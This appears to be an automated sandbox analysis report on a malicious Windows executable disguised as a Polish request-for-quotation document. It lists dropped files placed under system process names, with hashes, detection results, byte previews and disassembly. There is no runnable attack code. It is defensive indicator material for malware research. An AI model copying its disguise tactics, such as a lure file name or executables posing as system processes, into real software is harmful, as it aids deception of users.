                                                                                                                                                                                                                                                    Preview:{..VQO80N099..R0.EX9D4U6.YVRO80J099J0R0IEX9D4U6GYVRO80J099J0.0IEV&.:U.N.w.Nt.kdQP9."B&"*X).6W)79&oZUjBLWjY<.....)[1SiT[Xk80J099J`.0I.Y:D..!YVRO80J0.9H1Y1.EX.@4U"GYVRO8..499j0R0)AX9DtU6gYVRM80N099J0R0MEX9D4U6G.RRO:0J099J2Rp.EX)D4E6GYVBO8 J099J0B0IEX9D4U6GYj.K8.J099*4R'YEX9D4U6GYVRO80J099J.V0EEX9D4U6GYVRO80J099J0R0IEX9D4U6GYVRO80J099J0R0IEX9D4U.GY^RO80J099J0R8iEXqD4U6GYVRO80dD\A>0R0.d\9D.U6G{RRO:0J099J0R0IEX9D.U6'w$!=[0J0.)J0RPMEX+D4U.CYVRO80J099J0RpIE..6Q9Y$YV^O80J.=9J2R0Is\9D4U6GYVRO80Jp99.0R0IEX9D4U6GYVROHqN099J0.0IEZ9A4.EY..N83J09.J0T..GX.D4U6GYVRO80J099J0R0IEX9D4U6GYVRO80J099J0R0I.%.K....*..O80J098H3V6AMX9D4U6GY(RO8vJ09yJ0R.IEX.D4U[GYVvO80409940R0-EX964U6&YVR.80J_99J^R0I;X9D*W.gYVXe.0H..9J:R..6z9D>.7GYR!l80@.;9J4!.IER.G4U24|VRE.4J0=Jl0R:.@X9@..6D.@TO8+%.99@0Q.\CX9_.s6EqlRO20`.9:.%T0I^r.D6.?GYRx.K-J0?..0R:=LX9F._6G]|LM.tJ03.hNY0IAs9n.+:GYRyO..4=99N.R.WG.4D4Q.e'XRO<.J..GE0R4bEr'F.Z6G]|p1(0J4.9`.,!IE\.D.wHUYVVd8.hN*9J4y0cg&-D4Q.Gst,Z80N.9.hND0IAs9n.+!GYRyO..4(99N.R.WG.!D4Q.As4R=.%J@:
                                                                                                                                                                                                                                                    Process:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                                                                                    Entropy (8bit):0.41758136834515647
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:rl912N0xs+CFQXCB9Xh9Xh9XqlEij1b5X:rl3lKFQCb77eEipl
                                                                                                                                                                                                                                                    MD5:B189745447FFC0F0692BBEC0E4926FF0
                                                                                                                                                                                                                                                    SHA1:4F86C94BF1FEA524EC895BB300854140E8E45D9E
                                                                                                                                                                                                                                                    SHA-256:41DB75ED191E8D2FD951528E88F2060E1CB6531FEEC60E72BB9929E2B25E5A2E
                                                                                                                                                                                                                                                    SHA-512:2394E5BBB1FDD5F78F27E5118025B876B109EFADE413B8D1BCD9A561F84384B7928F670201FDB15952975653B9868B7CA0920B8F61CA3B84371B652E04C06567
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                                                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                                                    Entropy (8bit):1.2645041997918773
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:rl91bxbt+r+CFQXL379Xa9Xh9XR5+flEij1b5X:rl3b/+PFQLZG7ONEipl
                                                                                                                                                                                                                                                    MD5:68615E8002F9DDAFD1F818EF7957201B
                                                                                                                                                                                                                                                    SHA1:885572289EA26BDC332D5624C4E93FDB00C417F3
                                                                                                                                                                                                                                                    SHA-256:3C32FD4040390B85F944ACA964E50E0ED7777D7D87E870708A7F9FCA16F02001
                                                                                                                                                                                                                                                    SHA-512:377D755324FA9F18B5C14B9FB4C413ECB8FCA4445BA91E8223394C1FC32F16B5A5662012603A42F18D5E5CCC74D2FA7D9E8DD0C10C87E1716B9C127EDA4FBA82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\spoolsv.exe
                                                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                                                    Entropy (8bit):1.2638531581252106
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:rl91bxbt+r+CFQXa379Xa9Xh9XR5+flEij1b5X:rl3b/+PFQaZG7ONEipl
                                                                                                                                                                                                                                                    MD5:68D06F5DA2CB2FB5A6398F29976A2E86
                                                                                                                                                                                                                                                    SHA1:2F68F6C6F6E7CA8097238C9BD1CEF4A9E6054DFA
                                                                                                                                                                                                                                                    SHA-256:A71582DC116F29E36B0C8495B4CA62DB46BAA0F4ABC459EDD191072B75B3E6DA
                                                                                                                                                                                                                                                    SHA-512:DF31C368727D37F52E9030ECD354BAB5BDE78A279709FB408E6A3F448F1406B2FD326D771B296113B07140C307C826BA6C5AF9462E5542806A68659F216A794A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\spoolsv.exe
                                                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                                                    Entropy (8bit):1.2627968064006543
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:rl91bxbt+r+CFQXevX79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQi5G7ONEipl
                                                                                                                                                                                                                                                    MD5:145F626B4802890E2415DF8B45BBB97A
                                                                                                                                                                                                                                                    SHA1:8F6C29E30819C0449718738D0EDE976C216904BB
                                                                                                                                                                                                                                                    SHA-256:1664181BC00EF2ABD56F1257F82814947806171FC46B5F71CF741467E9559FFE
                                                                                                                                                                                                                                                    SHA-512:09E181BDD0CFB42102353AC8E0129D819D41002F6AC5DCA2766B7A0F291BBD96D4EA4EAFDACB4D72DDC494450951E591C992DE09823ED8A1C1225A1C2ECEC4DD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                                                                                    Entropy (8bit):0.41758136834515647
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:rl912N0xs+CFQXCB9Xh9Xh9XqlEij1b5X:rl3lKFQCb77eEipl
                                                                                                                                                                                                                                                    MD5:B189745447FFC0F0692BBEC0E4926FF0
                                                                                                                                                                                                                                                    SHA1:4F86C94BF1FEA524EC895BB300854140E8E45D9E
                                                                                                                                                                                                                                                    SHA-256:41DB75ED191E8D2FD951528E88F2060E1CB6531FEEC60E72BB9929E2B25E5A2E
                                                                                                                                                                                                                                                    SHA-512:2394E5BBB1FDD5F78F27E5118025B876B109EFADE413B8D1BCD9A561F84384B7928F670201FDB15952975653B9868B7CA0920B8F61CA3B84371B652E04C06567
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                                                    Entropy (8bit):1.2633291866166048
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:rl91bxbt+r+CFQXt79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQDG7ONEipl
                                                                                                                                                                                                                                                    MD5:02B9D27D3E44125431EF4D02D2FA7980
                                                                                                                                                                                                                                                    SHA1:901DBAF33FB596BF4FF88622C50FFA16B5994240
                                                                                                                                                                                                                                                    SHA-256:57B21C90F197937625BF7F4921FFB85A981AB866A8A4B4795C55BD2D059B503F
                                                                                                                                                                                                                                                    SHA-512:03A60D9DB8C52D3A920A43FA16BC0A8DAB6A992F00DFC9403F6E81DF083DFBEF0EBD31419BAF7F780B4E486E3B6805DEB2DABE2CA8A81A76CB30B9975561BDB7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                                                    Entropy (8bit):1.2636074265164334
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:rl91bxbt+r+CFQXE379Xa9Xh9XR5+flEij1b5X:rl3b/+PFQEZG7ONEipl
                                                                                                                                                                                                                                                    MD5:E05B680DD1DF78E724455FB7158F4311
                                                                                                                                                                                                                                                    SHA1:19DBE38E76062A31AD83B89DDF3279B8DD8ACBCA
                                                                                                                                                                                                                                                    SHA-256:C1651471F6B98B5082F899185E4AF50D93845AB9174AB594B8A89A0249988A2D
                                                                                                                                                                                                                                                    SHA-512:5AC5F3A9A67903B1356383D5026261FC845485C31696B2D0FFE2F22F9CC2E1CDDC5E2B94713184E3A1B5DE7E28A347AAC6C98400592D1F1F2A1F83071DAF8467
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):281030
                                                                                                                                                                                                                                                    Entropy (8bit):5.264133173177648
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unEQ:UvEN2U+T6i5LirrllHy4HUcMQY67Q
                                                                                                                                                                                                                                                    MD5:30957BE4D1D5957A9D6433367CEF30EF
                                                                                                                                                                                                                                                    SHA1:DF2D8A795BD221D77B0BC167D05203AB6B6B2FCA
                                                                                                                                                                                                                                                    SHA-256:CEDCF4E2FFC34660E6E4BDD8E3CAB70B2C805704CEB302F29E3B5A3C4E6EAC5C
                                                                                                                                                                                                                                                    SHA-512:36382E3597704764AE1300CA3C857B50F2FABE7F557C36240206749DFA89FB435F313511D72D5DED60DB9B38237F0D983F0AF78F3440AC7DFAA7014E3085E161
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):280964
                                                                                                                                                                                                                                                    Entropy (8bit):5.2782425104140485
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unE0:UvEN2U+T6i5LirrllHy4HUcMQY670
                                                                                                                                                                                                                                                    MD5:D9DF41230ED665D3BFD1699F553A0DB6
                                                                                                                                                                                                                                                    SHA1:920A122D6421D67C99B034ED01089C8868EC4E3C
                                                                                                                                                                                                                                                    SHA-256:54471B3BDA76566C011DA454A12BEE2C7BE254C2CA8B87C7B77EC6D5F0F6A51D
                                                                                                                                                                                                                                                    SHA-512:121CEE3E6A5FBAAC95A275479327CC5585DED0D7DB9AFB0AC239C53C2DBBD4F29893E685A1DCB7EA84FB36B64D19C118B33C4E1482E631915C425D2B1C0D12FF
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):280879
                                                                                                                                                                                                                                                    Entropy (8bit):5.284570362955645
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unEK:UvEN2U+T6i5LirrllHy4HUcMQY67K
                                                                                                                                                                                                                                                    MD5:E57E0355C01800F09C67E2624DE30125
                                                                                                                                                                                                                                                    SHA1:DED144F61FA9C51909352E7108596F17510A13D1
                                                                                                                                                                                                                                                    SHA-256:E5C39768360C0C0A443F9FC2ACF30519BB871F5082EE9E7DEF7B690DCF0667E9
                                                                                                                                                                                                                                                    SHA-512:6BA317FC0F2D421FA41E1AAD1B8110C9D6458FA3AC4084473770FA44377AC4643C9FA838EEBA4D9540A3F3ADD9B4907EBD5872082EDE98A7A74A687763204141
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1243595
                                                                                                                                                                                                                                                    Entropy (8bit):7.459432026976749
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:ffmMv6Ckr7Mny5QLvmVib5B6lhswkKa59PK01LnRiap:f3v+7/5QLvmG6lh8KmrLX
                                                                                                                                                                                                                                                    MD5:6A6157CD22CD9558F8579C30632E62C1
                                                                                                                                                                                                                                                    SHA1:7451D8E77A65FF7E9DDEBDF73183CBD684D3FDFD
                                                                                                                                                                                                                                                    SHA-256:C3E272AF01D2B5739D8F91CE17D80E13818A59FE50F5545D09FEA9A669520667
                                                                                                                                                                                                                                                    SHA-512:4E41562A7279AF1B4B4A0513B4F75965F04729FC3D6D71A9C74634A24257143BEE308C942ABB3E5DE5B29BDAFDE86CCFAC5F906F1C26B4A0B40C54B0FE47FA3A
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (8047)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):56985
                                                                                                                                                                                                                                                    Entropy (8bit):5.380924866576166
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:PyMapcrHsCNwn1d0kelTa1uJ8+C7d7cjmZ2clnlZ+/Y:Pq8wnSjq2clnlZCY
                                                                                                                                                                                                                                                    MD5:47F0F1D21C5A40DBAF883F186B1EFC9C
                                                                                                                                                                                                                                                    SHA1:E066A383D291E94AD1ABD45A59FE8DD671F76D1E
                                                                                                                                                                                                                                                    SHA-256:D9B6C8BB841678B66D95FD942CEF7E0EDA384D687DBA8E8D6D53382BECEC1E86
                                                                                                                                                                                                                                                    SHA-512:35413EF81F8C021AE5398DCCA5E6F9FF365AB77CE253753D1235F5752ABFA6D050363EDD870598A2F52598D39D4DE2F156FF712F150ECDC46A4F5DC6EEF73824
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en-US" class="s-dark site-s-dark">..<head>...<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site is optimized with the Yoast SEO Premium plugin v18.0 (Yoast SEO v18.4.1) - https://yoast.com/wordpress/plugins/seo/ -->..<title>What happened to the old ZXQ website? | ZXQ</title><link rel="preload" as="font" href="https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2" type="font/woff2" crossorigin="anonymous" />..<link rel="canonical" href="https://zxq.net/what-happened-to-the-old-zxq-website/" />..<meta property="og:locale" content="en_US" />..<meta property="og:type" content="article" />..<meta property="og:title" content="What happened to the old ZXQ website?" />..<meta property="og:description" content="Information For ZXQ.net Subdomain Owners The old ZXQ website
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):280955
                                                                                                                                                                                                                                                    Entropy (8bit):5.278591312442739
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unEo:UvEN2U+T6i5LirrllHy4HUcMQY67o
                                                                                                                                                                                                                                                    MD5:40D6074239B5794D42186340C0FB7B60
                                                                                                                                                                                                                                                    SHA1:A2F3C78CA707A8D44675934D9C0F52B2D69D3C08
                                                                                                                                                                                                                                                    SHA-256:573B329EA4A51B1127B5DA65EE01B3B81060F0F507A54B1F001C4CE57A42620D
                                                                                                                                                                                                                                                    SHA-512:27721EEBD2F86A3B440F320BA5C2A7EB566B58B4D9C3B3C6A0B5DA8CD036D001955D06024F9B1E8E4079F0838DF6957404DB368A2FE27CBE3F26C1B0E269AE33
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):281100
                                                                                                                                                                                                                                                    Entropy (8bit):5.268192078984638
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unEz:UvEN2U+T6i5LirrllHy4HUcMQY67z
                                                                                                                                                                                                                                                    MD5:654CCF32F8E2748995C732C707A09AC1
                                                                                                                                                                                                                                                    SHA1:3D3BE95E3562DF9DF8037012D70CFF89EBD353F3
                                                                                                                                                                                                                                                    SHA-256:ACCA7609A4214D519E632CFAECBE747FEA981B27F1F31A89BA09876B0306C15A
                                                                                                                                                                                                                                                    SHA-512:72D1FBA3760649FE7E51C027FB77343DC87B84BDE16249C263DA46D966C3C5844EBBAE1FBE32953462CCD625F6797CD9E920FC5D64DEA6E55404CE64BF4AF3B8
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System\spoolsv.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):281051
                                                                                                                                                                                                                                                    Entropy (8bit):5.279370972501163
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unEh:UvEN2U+T6i5LirrllHy4HUcMQY67h
                                                                                                                                                                                                                                                    MD5:EA31FB96DC9A76CAEFA570341CD194E2
                                                                                                                                                                                                                                                    SHA1:61869267700F223D5B85A879DB03CFE3449E6F85
                                                                                                                                                                                                                                                    SHA-256:7A19592FDA5204B19B5D410C6AE1837257E6F28DB5C8DCBA6DA2B2409E165940
                                                                                                                                                                                                                                                    SHA-512:0F923F1D43396B7E0739FAE6D828471DEA52C90F594F9AA225FAED6F50FD3F1DEB300C07971C0DE05B1B504D447EC5E537B80E07BD2CE7470A6BD6D24C2D0E22
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):7.161868832252882
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                                                                                                                                                                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                                                                                                                                                                                                                                                    File size:1'524'650 bytes
                                                                                                                                                                                                                                                    MD5:e9698d7f3a85335c8610cde2fecc54e8
                                                                                                                                                                                                                                                    SHA1:fbc277222d6971e42acaf87975b7b565b9b63a9e
                                                                                                                                                                                                                                                    SHA256:72292a987383f0079a0a846bae4ee6345f008f991a50f5f6d7fed2cad91339ad
                                                                                                                                                                                                                                                    SHA512:d71038e7356636efa5b3691ea66e6f74cf5749720bb0a7a009f4487dada8a9e679865ab2e263de2cf91e0af6a006d3af904a1bbb958715ec00cde98c2c48335d
                                                                                                                                                                                                                                                    SSDEEP:24576:K5xolYQY6afmMv6Ckr7Mny5QLvmVib5B6lhswkKa59PK01LnRiaZ:dY53v+7/5QLvmG6lh8KmrLf
                                                                                                                                                                                                                                                    TLSH:8B65D022B7C5507AD86379F02977E36BAB353D150722C88B67E02F665D31102BA7632F
                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@................
                                                                                                                                                                                                                                                    Icon Hash:0f3331292513170f
                                                                                                                                                                                                                                                    Entrypoint:0x403670
                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                                                                                                    Time Stamp:0x4DF7AFFC [Tue Jun 14 19:01:16 2011 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                    Import Hash:98f67c550a7da65513e63ffd998f6b2e
                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    push 00403ED4h
                                                                                                                                                                                                                                                    call 00007FB43C4FA685h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    inc eax
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], dh
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], bh
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ecx-7FFA577Dh], dl
                                                                                                                                                                                                                                                    adc eax, dword ptr [bx-4Fh]
                                                                                                                                                                                                                                                    push edx
                                                                                                                                                                                                                                                    xchg eax, ebx
                                                                                                                                                                                                                                                    pop eax
                                                                                                                                                                                                                                                    jnc 00007FB43C4FA61Dh
                                                                                                                                                                                                                                                    nop
                                                                                                                                                                                                                                                    add al, 00h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ecx], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax+00h], al
                                                                                                                                                                                                                                                    hlt
                                                                                                                                                                                                                                                    test al, F6h
                                                                                                                                                                                                                                                    add byte ptr [edi+69h], dl
                                                                                                                                                                                                                                                    outsb
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
